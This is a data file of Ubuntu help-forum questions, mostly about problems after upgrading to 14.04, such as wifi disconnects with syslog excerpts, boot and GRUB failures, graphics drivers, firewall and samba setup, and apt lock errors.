454427	network issues since trusty	since upgrading ( fresh install ) to trusty ( kubuntu - edit and now ubuntu vanilla , i switched back to further troubleshoot this ) i have noticed network issues . exactly every two minutes my network craps out for a moment but then shortly comes back online . this is clearly reflected in the syslog : apr 24 07:52:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 07:52:51 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 07:54:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 07:54:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 07:56:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 07:56:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 07:58:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 07:58:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 08:00:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 08:00:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 08:02:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 08:04:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 08:04:51 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 08:06:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 08:06:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 08:08:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 08:08:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 08:10:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 08:10:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 08:12:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 08:12:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 08:14:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 08:14:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 08:16:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 08:16:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 08:18:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 08:18:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 apr 24 08:20:45 jordan-tecra-r840 wpa_supplicant [ 1271 ] : wlan0 : ctrl-event-scan-started apr 24 08:20:50 jordan-tecra-r840 wpa_supplicant [ 1271 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 i have n't spent too much time troubleshooting yet , i have only just installed a day ago . i was wondering if anyone has seen this issue before ? i do n't recall seeing this back when i was on ubuntu 13.10 with the exact same hardware only 3 days ago . hardware : tecra r840-s8430 network controller : intel corporation centrino advanced-n 6230 [ rainbow peak ] ( rev 34 ) flavor : kubuntu + ubuntu release : 14.04 lts update - more information ( 5/05/05 ) yes , this appears to be dropping my connection . here is some syslog from a typical drop , i have to disable/re enable wifi to get it back up : may 5 09:29:57 oban kernel : [ 74616.819616 ] wlan0 : deauthenticated from 00:26:62:4f : c3 : f6 ( reason : 6 ) may 5 09:29:57 oban wpa_supplicant [ 1368 ] : wlan0 : ctrl-event-disconnected bssid=00:26:62:4f : c3 : f6 reason=6 may 5 09:29:57 oban networkmanager [ 1151 ] : < warn > connection disconnected ( reason 6 ) may 5 09:29:57 oban kernel : [ 74616.851674 ] cfg80211 : calling crda to update world regulatory domain may 5 09:29:57 oban wpa_supplicant [ 1368 ] : wlan0 : sme : trying to authenticate with 00:26:62:4f : c3 : f6 ( ssid='air ' freq=2462 mhz ) may 5 09:29:57 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected may 5 09:29:57 oban wpa_supplicant [ 1368 ] : wlan0 : ctrl-event-scan-started may 5 09:29:57 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > authenticating may 5 09:29:57 oban kernel : [ 74616.921570 ] wlan0 : authenticate with 00:26:62:4f : c3 : f6 may 5 09:29:57 oban kernel : [ 74616.925036 ] wlan0 : send auth to 00:26:62:4f : c3 : f6 ( try 1/3 ) may 5 09:29:57 oban kernel : [ 74616.931650 ] cfg80211 : world regulatory domain updated : may 5 09:29:57 oban kernel : [ 74616.931654 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 5 09:29:57 oban kernel : [ 74616.931656 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:29:57 oban kernel : [ 74616.931658 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:29:57 oban kernel : [ 74616.931659 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:29:57 oban kernel : [ 74616.931661 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:29:57 oban kernel : [ 74616.931662 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:29:57 oban kernel : [ 74617.031487 ] wlan0 : send auth to 00:26:62:4f : c3 : f6 ( try 2/3 ) may 5 09:29:57 oban kernel : [ 74617.035474 ] wlan0 : authenticated may 5 09:29:57 oban wpa_supplicant [ 1368 ] : wlan0 : trying to associate with 00:26:62:4f : c3 : f6 ( ssid='air ' freq=2462 mhz ) may 5 09:29:57 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating may 5 09:29:57 oban kernel : [ 74617.039506 ] wlan0 : associate with 00:26:62:4f : c3 : f6 ( try 1/3 ) may 5 09:29:57 oban kernel : [ 74617.043029 ] wlan0 : rx assocresp from 00:26:62:4f : c3 : f6 ( capab=0x431 status=0 aid=4 ) may 5 09:29:57 oban wpa_supplicant [ 1368 ] : wlan0 : associated with 00:26:62:4f : c3 : f6 may 5 09:29:57 oban kernel : [ 74617.050233 ] wlan0 : associated may 5 09:29:57 oban kernel : [ 74617.050393 ] cfg80211 : calling crda for country : us may 5 09:29:57 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : supplicant interface state : associating - > associated may 5 09:29:57 oban kernel : [ 74617.056664 ] cfg80211 : regulatory domain changed to country : us may 5 09:29:57 oban kernel : [ 74617.056673 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 5 09:29:57 oban kernel : [ 74617.056679 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) may 5 09:29:57 oban kernel : [ 74617.056685 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) may 5 09:29:57 oban kernel : [ 74617.056690 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:29:57 oban kernel : [ 74617.056695 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:29:57 oban kernel : [ 74617.056700 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:29:57 oban kernel : [ 74617.056705 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) may 5 09:29:57 oban kernel : [ 74617.056711 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) may 5 09:29:57 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake may 5 09:29:57 oban wpa_supplicant [ 1368 ] : wlan0 : wpa : key negotiation completed with 00:26:62:4f : c3 : f6 [ ptk=ccmp gtk=ccmp ] may 5 09:29:57 oban wpa_supplicant [ 1368 ] : wlan0 : ctrl-event-connected - connection to 00:26:62:4f : c3 : f6 completed [ id=0 id_str= ] may 5 09:29:57 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed may 5 09:31:34 oban kernel : [ 74713.775114 ] wlan0 : deauthenticated from 00:26:62:4f : c3 : f6 ( reason : 6 ) may 5 09:31:34 oban wpa_supplicant [ 1368 ] : wlan0 : ctrl-event-disconnected bssid=00:26:62:4f : c3 : f6 reason=6 may 5 09:31:34 oban networkmanager [ 1151 ] : < warn > connection disconnected ( reason 6 ) may 5 09:31:34 oban kernel : [ 74713.812782 ] cfg80211 : calling crda to update world regulatory domain may 5 09:31:34 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected may 5 09:31:34 oban kernel : [ 74713.816717 ] cfg80211 : world regulatory domain updated : may 5 09:31:34 oban kernel : [ 74713.816724 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 5 09:31:34 oban kernel : [ 74713.816729 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:31:34 oban kernel : [ 74713.816732 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:31:34 oban kernel : [ 74713.816735 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:31:34 oban kernel : [ 74713.816738 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:31:34 oban kernel : [ 74713.816741 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 5 09:31:34 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning may 5 09:31:49 oban networkmanager [ 1151 ] : < warn > ( wlan0 ) : link timed out . may 5 09:31:49 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : device state change : activated - > failed ( reason 'ssid not found ' ) [ 100 120 53 ] may 5 09:31:49 oban networkmanager [ 1151 ] : < info > networkmanager state is now disconnected may 5 09:31:49 oban networkmanager [ 1151 ] : < warn > activation ( wlan0 ) failed for connection 'air' may 5 09:31:49 oban dbus [ 943 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) may 5 09:31:49 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] may 5 09:31:49 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] may 5 09:11:56 oban whoopsie [ 1374 ] : online may 5 09:31:49 oban whoopsie [ 1374 ] : offline may 5 09:31:49 oban kernel : [ 74729.721867 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 5 09:31:49 oban networkmanager [ 1151 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 11587 may 5 09:31:49 oban avahi-daemon [ 1099 ] : withdrawing address record for fe80 : :8a53:2eff : fe07:49c8 on wlan0 . may 5 09:31:49 oban avahi-daemon [ 1099 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :8a53:2eff : fe07:49c8 . may 5 09:31:49 oban avahi-daemon [ 1099 ] : interface wlan0.ipv6 no longer relevant for mdns . may 5 09:31:49 oban networkmanager [ 1151 ] : < warn > dns : plugin dnsmasq update failed may 5 09:31:49 oban networkmanager [ 1151 ] : < info > removing dns information from /sbin/resolvconf may 5 09:31:49 oban avahi-daemon [ 1099 ] : withdrawing address record for 192.168.1.5 on wlan0 . may 5 09:31:49 oban avahi-daemon [ 1099 ] : leaving mdns multicast group on interface wlan0.ipv4 with address 192.168.1.5 . may 5 09:31:49 oban avahi-daemon [ 1099 ] : interface wlan0.ipv4 no longer relevant for mdns . may 5 09:31:49 oban dnsmasq [ 1888 ] : setting upstream servers from dbus may 5 09:31:50 oban networkmanager [ 1151 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . may 5 09:31:50 oban dbus [ 943 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' this is so frustrating . i ca n't always be on cat5 . as i said before , this never happend on 13.10 . i really do not want to downgrade . is there a way i can use the wifi drivers from 13.10 ? also , i changed my wifi security from wpa2 to 128 wep and so far i have only disconnected once in a few hours . on wpa2 it was every 10 on average .
454428	playing wow after upgrading to 14.04	wow played fine on 13.10 but since the upgrade to 14.04 it wo n't open . say 's i need the latest version of directx which i can not install through wine .
454431	14.04 lts trial fails on my vista pc	recently tried to test the live 14.04 lts cd on my vista machine . 13.10 runs properly . no problem . mouse works as expected . 14.04 loads and opens the live session but the mouse no longer functions . the tab key and enter key also do not work . i have to shut down the pc to get out . is this because 14.04 is set up for a touch screen . it 's strange that 13.10 runs and 14.04 lts locks up . the pc has 3.0 gb of ram and a 3 gig amd athlon 64 dual core processor . it 's running vista home premium sp 2 , 32 bit os . what am i missing ? thanks
454435	unable to install program because of unsatisfiable dependency	i have tried to install the program syncdrive . when ubuntu software center opens it says that dependency is not satisfiable : libboost-system1.40.0 ( > =1.40.0-1 ) . so then i i looked on line and found the install for libboost-system 1.40.0 download the .dep file and when it opens the software center to install it gives me the same error . i have my system fully updated . please help as i am new at this
454436	14.04 : how to disable discrete graphics card	i know 14.04 has kernel 3.13 and is supposed to be better at dynamic power management . my problem is the estimated remaining time keeps changing . but on an average i see 5 hours . on same machine on linux mint 15 ( based off 13.04 ) i used vgaswitcharoo method and used to get at least 6 hours . echo off > /sys/kernel/debug/vgaswitcheroo/switch does not work any more . i 've tried acpi_call method mentioned here : http : //www.noobslab.com/2013/10/enable-laptop-mode-and-other-tweaks-to.html unfortunately my card is n't listed/supported also ( unsuccessfully ) tried : http : //www.webupd8.org/2014/04/prevent-your-laptop-from-overheating.html in case there are card specific suggestions , i have following cards : $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] [ 1002:6840 ] ( rev ff )
454440	ca n't allow a specific ip in ufw	i 've just got myself a vps and am completely new to running a server . i 've installed ufw as i only want to allow access to it from one particular domain hosted on another server . i 've read the documentation and have tried : sudo ufw allow from < ip of my website > but it still seems to be blocked and i do n't understand why . the server is running a flash media streaming service but even with the above rule , my website wo n't connect it . i 'm sure i 'm missing something obvious but do n't know what it is . thanks in advance for any help
454441	grub wo n't even come up after upgrade to 14.04 dual boot win8	i 'm a bit of a noob , so bare with me here . i 'm running a toshiba qosmio v1.32002 . i have had a dual booted win8/ubuntu 13.10 traditionally , and i recently upgraded to 14.04 . now when i start my computer , the grub bootloader does n't even pop up and goes straight to starting up win8 . any idea as to how i could go about bringing my ubuntu back from the dead here ? i 've been seeing a lot of people talk about how grub errors pop up , and that simply is n't even happening in this case .
454443	how do i deal with `` undefined reference to dlopen '' errors while compiling and using openfst on ubuntu ?	trying to compile and use openfst on ubuntu 13.10 leads to link errors like `` undefined references to dlopen '' . how does one fix this ? searching online suggests including -ldl in the gcc command line , but that is not sufficient .
454445	changed driver for graphic card but still problems with fans and low performance	first of all thank you for your help ! my laptop specifications : hp-probook core i 4 gb ram intel 4000 hd + amd catalyst hd ( the new version ) i installed my ati drivers by using additional drivers , but the result was zero fan , and the processor is still working very bad . i disabled my ati , working on intel , but when i check system details , intel is still unknown . i would like to know if i can install my intel+amd drivers . i would like to enjoy opengl+ gtk . note : i ca n't determine anything about my ati card , but i only know that it is 2 gb . my distro is ubuntu 12.04 lts
454447	directory locked	i have been trying to install virtualbox using this command : sudo apt-get install virtualbox.qt but i am getting this error : e : unable to lock directory /var/cache/apt/archives/ i have been trying to find the answer here and have already tried : sudo rm /var/lib/dpkg/lock sudo dpkg -- configure -a sudo rm /var/lib/dpkg/lock sudo rm /var/cache/apt/archives/lock ps aux | grep apt kill -9 processnumber but none of them work .
454449	ubuntu 13.10 to 14.04 upgrade : filesystem check or mount failed	i had a power failure while upgrading from 13.10 to 14.04 and and ended up with a couple of problems . first i ended up the `` system is running in low-graphics mode '' error described here and managed to fix it following the described steps . however , currently when i start ubuntu in new version ( if i select previous versions on the grub menu i 'm fine ) i get a filesystem check or mount error filesystem check or mount failed . a maintenance shell will now be started . control-d will terminate this shell and continue booting after re-trying filesystems . any further errors will be ignored root @ ubuntu-computername : ~ # similar to the problem described here . however i am unable to do sudo mount -o remount , rw / as recommended on the second link . i get this error message : can not remount block device /dev/loop0 read-write , is write-protected any idea how to fix this ? update : ok , so i ended up giving up and starting fresh but i want to post what little i have learned in case someone else has a similar problem : there were a few system files and directories that were for some reason empty or damaged , namelly fstab , mstab and \tmp . and the system was not able to to umount /dev/loop0 . i 'm sorry i ca n't remember much more details of the top of my head , i tried to recover the system with the help of a friend and to be honest , before yesterday i did n't even know fstab and mstab existed .
454450	ubuntu 14.04 online accounts integration	i ca n't find any documentation on integration oauth2 services to ubuntu online accounts . trying to add http : //vk.com support . chosen facebook plugin as example . here is documentation https : //vk.com/dev/auth_mobile
454451	need a shell script to find the latest file from a directory and move it to another on a weekly basis	i am new to shell scripting and i need some help with it . i have a requirement to move the latest expdp dump file from one directory to another where it will be maintained for 90 days and then deleted . this job should run once a week .
454453	ubuntu 14.04 get back `` old '' wireless driver from 13	i just updated to 14.04 and i am loving it . the only problem is , that i used to be able to connect to my company 's wifi on 13.10 but since i updated it 's not possible any more . many distros have problems with that network but , however , 13.10 could connect . i can connect to `` normal '' networks on 14.04 without problems , but this network is a bit picky so my question now is , how can i roll back to the driver / network manager from 13.10 ? thanks in advance .
454455	avast antivirus is not getting updated	i have just installed the avast antivirus for ubuntu and tried to update it but it was'nt successful . now it is not functioning properly and showing a bulk of errors .
454456	issue on installing ubuntu hp xw9300	i 'm quite new to ubuntu . i installed it sucessfully on a laptop , and a regular pc . i am now trying to install ubuntu 12.04 on a hp xw9300 workstation . hardware specification can be found here i have nvidia quadro nvs 280 graphics card . the installer from an usb key run smoothly . but when i boot the pc right after , i can t have a graphical display . ( i just have the desktop background of ubuntu ; no tool bars ) . the console mode works fine . i have the same problem with both i86 and amd64 versions of ubuntu . the error i have : [ ttm ] failed to find memory space for buffer eviction e [ xorg [ 1106 ] ] fail ttm_validate e [ xorg [ 1106 ] ] validate vram_list e [ xorg [ 1106 ] ] validate : -12 and this is repeating . i manage to run apt-get update , apt-get upgrade from console . i browsed the web to find answers . if you have any idea of what could be blocking , any help will be welcome . reguards .
454459	my hp 650 's bluetooth/wifi has defied all solutions	please help ! all the solutions given to activate blue tooth and wireless connections in my hp 650 running on ubuntu 12.04 has not worked . i ve tried updates , codes to turn on , the rfkill options , etc . i just switched from windows8 to ubuntu 12.04 , and this is not what i bargained for , please help ! ! ! i did - > lspci -nn | grep 0280 and it brought out 02:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:3290 ]
454463	install and run lxde qt	i am planning to install lubuntu 14.04 on a new partition . i am assuming that it runs lxde gtk . how can i install lxde qt ? can both co-exist on the same partition ? how to switch between the two ?
454465	i ca n't boot from usb	i was trying to install ubuntu but when i select the usb boot option on my bios it does nothing , just got a black screen and the computer restarts . i was able to install windows xp via usb on that computer . i 've already tried a few programs like unetbootin and lilli but the computer keeps restarting . i 've been using the 14.04 iso
454470	ubuntu 13.10 performance for 1 gb machine	i installed ubuntu 13.10 to my desktop which has 1 gb main memory and amd 64 bits cpu . it happens that the system freeze , applications not response sometimes and crashes a few times . i just learn that 1 gb is minimum requirement for ubuntu 64 bits . i just wonder if it is memory not enough that i better to increase to 2 gb to improve performance . your help and information is great appreciated , regards , inung
454477	samba user and guest permissions	i have a folder in /var/www/html/ that people upload files to via php called store . store has the permissions rwxrwxr -- it is owned by the user josh and the www-data group . the store folder is also an smb share and works if i use josh to login to it . however i need everyone to be able to access it but without write permissions as well . this is what i have tried in my samba config : [ propellor ] path = /var/www/html/store browsable = yes guest ok = yes read only = yes write list = josh create mask = 755 mapping a network drive in windows allows me to read and write if i use josh credentials but will not let me open the share at all if i am a guest or use another ( windows ) user account . i am missing something in my settings or permissions surly . thanks !
454481	the disk contains an unclean file system error when accessing drive	i have installed ubuntu 14.04 along side windows 8.1 in my computer . while using ubuntu i could n't access the drive and shows following error while opening the drives . error mounting /dev/sda5 at /media/krishna/data : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/krishna/data '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . please ! suggest me how can i resolve this problem .
454483	ca n't get buttons to work wx.python ( ubuntu 12.04 lts )	try : import wx except importerror : print 'module not found' class frame ( wx.frame ) : def __init__ ( parent , id ) : wx.frame.__init__ ( self , parent , id , ) panel = wx.panel ( self ) button = wx.button ( panel , label = 'close ' , size = ( 50,50 ) ) self.bind ( wx.evt_button , self.oncloseme , button ) self.bind ( wx.evt_close , self.onclosewindow ) def oncloseme ( self , event ) : self.close ( true ) def onclosewindow ( self , event ) : self.destroy ( ) if __name__ == '__main__ ' : app = wx.app ( ) frame = wx.frame ( parent = none , id =-1 , title = 'widget ' , size = ( 300,100 ) ) frame.show ( ) app.mainloop ( ) hi guys , the code above is just to create a button in wxpython.but everytime i run the code , only the frame appears , no buttons or whatsoever inside , just blank.i tried to reinstall the wxpython module but no luck . my second question is whenever i try to initialize say , title = 'widget ' , size= ( 300,100 ) in the frame constructor like wx.frame.init ( self , parent , id , title ='widget ' , size = ( 300,100 ) it does not work , i have to do it through this line : frame = wx.frame ( parent = none , id =-1 , title = 'widget ' , size = ( 300,100 ) ) why is that so.thanks .
454488	how can i open old gnome keyring files ?	i know the password to my old gnome keyring files , but how can i open them from my new installation ? [ 1 ] the keyring import option does n't recognise the .keyring and .keystore.abc files in the old .local/share/keyrings folder . is there another way to open them ? [ 1 ] i do n't have my old installation anymore , only the home folder .
454492	smp with imac 27 '' ( 2013/14 )	i 'm a sysadmin for a university , and i was setting up a new imac 27 '' triple booting mac os , windows 8.1 , and ubuntu 14.04 x64 . i have all of the operating systems working and booting procedures fine , but am unable to boot ubuntu properly unless i append nosmp as a kernel parameter at boot . i did a bit of research , and it has to do with symmetric multiprocessing . ordinarily i would just leave it out , but with smp turned off , only one core shows up for use . obviously for someone who wants to utilize the full power of their machine , this wo n't work . tl ; dr ubuntu wo n't boot unless nosmp is appended to kernel . need to figure out a way to have smp turned back on so that all processors and cores can be used . thanks so much !
454497	apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ... waiting apache2:	i upgraded to ubuntu 14.04 yesterday . but after restarting pc , this message continues to appear in a black screen after the ubuntu loading screen and do n't go away and ubuntu does n't start i can do nothing about this . what should i do ? i tried logging in from other terminals and do asm here but still nothing
454498	change toolbar button style in ubuntu 14.04	prior to 14.04 i have been able to do : gsettings set org.gnome.desktop.interface toolbar-style both this used to change my toolbars to icons with text below in all apps that adhered to the rules . in 14.04 it has no effect on most programs ( transmission , gedit , for instance ) . is there another dconf key for this , or has something else changed ?
454501	fan is always on , cpu usage is rather low and ca n't find the fan or thermal_zone proc files	i have an asus n76vb notebook with ubuntu 14.04 and tlp for power managment . however , the fan is always on . it 's not really loud , but it 's annoying . my cpu usage is around 1-2 % . it 's clocked at 1.20 ghz . i 've added acpi=force to my boot parameters but it does n't change anything . /proc/acpi/fan : no such file or directory /proc/acpi/thermal_zone : no such file or directory i 've loaded all asus acpi modules . lsmod | grep asus : asus_nb_wmi 16990 0 asus_wmi 24191 1 asus_nb_wmi sparse_keymap 13948 1 asus_wmi video 19476 2 i915 , asus_wmi wmi 19177 2 mxm_wmi , asus_wmi somehow , it can read the temperatures . sensors : acpitz-virtual-0 adapter : virtual device temp1 : +43.0°c ( crit = +108.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +44.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +44.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +42.0°c ( high = +87.0°c , crit = +105.0°c ) core 2 : +39.0°c ( high = +87.0°c , crit = +105.0°c ) core 3 : +39.0°c ( high = +87.0°c , crit = +105.0°c ) asus-isa-0000 adapter : isa adapter temp1 : +43.0°c i really hope someone knows how to solve this . almost all information i could find was about saving power to create less heat . i got intel and nvidia ( geforce 740m ) graphics but i 'm almost anytime on intel . $ sudo lshw -c display *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:43 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) fwts fan : http : //pastebin.com/tcrw4tn6
454502	what are the 3 flavours in ubuntu 14.04 lts ?	i can find these 3 flavours on ubuntu download page , but previously , i could find only 32 and 64 bit versions . can anybody explain about each ? 64-bit 32-bit ( for machines with less than 2gb ram ) 64-bit mac ( amd64 ) note : i have i5-4gb system .
454505	ubuntu update manager fails	i have ubuntu desktop installed . every time update manager runs it fails : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/g/gnutls26/libgnutls26_2.12.14-5ubuntu3.6_amd64.deb 404 not found [ ip : 91.189.88.149 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/l/linux-firmware/linux-firmware_1.79.10_all.deb 404 not found [ ip : 91.189.88.149 80 ] i can ping and curl 91.189.88.149 just fine . since it 's returning 404 , there is an active http server on port 80 . for some reason update-manager is requesting an invalid resource . it 's been failing to update for the last few months . update manager appears when i select `` updates available ... '' from the gear icon/menu . i 'm running ubuntu 12.04.4 lts . follow-up : update manager has been renamed to software updater .
454510	hd 5450 display snow when connected to the pioneer receiver	i have a gigabyte itx board with onboard video through intel 's hd 4600 . i was able to make it work correctly but i was not getting any sound throught hdmi with it . so i tried with two different pci-e hd 5450 ( msi & power color ) . i have tried reinstalling the drivers following different how-to found here and there . all i get is snow on the tv . like if there was something odd with the config . but since xorg.conf is not used anymore or only partially to what i understood . i have no clue how i could solve this ... i would appreciate a bit of help .
454512	are there any way to see how much space is used for ubuntu ?	i can see how much space using in windows , since ubuntu uses root concept , there is no particular hard drive any more . how can i tell how much space left using ubuntu ?
454516	configure bluez as `` ble only '' device	is it possible to configure bluez ( 5.17 ) in a way that it a bluetooth dongle appears as a `` ble only '' ( bluetooth low energy ) device ?
454517	schedule shutdown	i found the command ( shutdown -h 02:00 ) to schedule shutdown my machine but want to know that is it compulsory that user must have logged in with root login ? or this command would works for all user ?
454518	how can i find my bug-report on launchpad that i submitted from the desktop ?	how can i find my bug-report that i submitted from the desktop on launchpad ? i have found a partial solution to my own question : the program that sends the bug-reports from the desktop is called apport . it does n't requires a launchpad account . the service whoopsie submits the bug-report directly to the server daisy.ubuntu.com ( i 'm not sure if those bugs actually appear on launchpad publicly . ) but i found my bug-report on my harddisk in /var/crash/ . from there i can copy and paste parts of the file to my opened bug on launchpad . thanks for your tips . original question : i had a severe bug , and i found someone with the same problem in launchpad . after i found a temporary fix i was able to submit the bug with the ubuntu-bug-reporter . how can i find this ubuntu-bug-reporter generated bug-report in launchpad ? i would like to combine those two bug-reports ( mark as duplicate ) . because the generated one has all the debug information and the other one has the description of this bug .
454520	icons on top status/menu bar in gnome not following theme	on ubuntu 12.04 lts , i added an icon theme and activated it using unity tweaks . all icons everywhere have changed to my new theme , but the top bar has n't changed . all icons are still from the original humanity pack and when a window is maximised , it 's `` minimise '' , `` maximise '' and `` close '' icons in the top status/menu bar are the plain ones from the humanity theme . here 's the screenshot of what a themed window looks like ( left corner only ) : and here 's the screenshot of what the maximised ( in top status/menu bar at the top ) window looks like : the rest of the icons on the top bar in the right hand side are also remaining in the original theme and are not changing . how can i force the icons to update in the top bar ?
454523	reinstall windows 7 ( with ubuntu and windows7 )	i have windows 7 already installed on my computer but i need to reinstall it . i have no data on my windows and i do not care if anything happens to the old windows , but i need to keep my ubuntu safe ! i will appreciate if you help me .
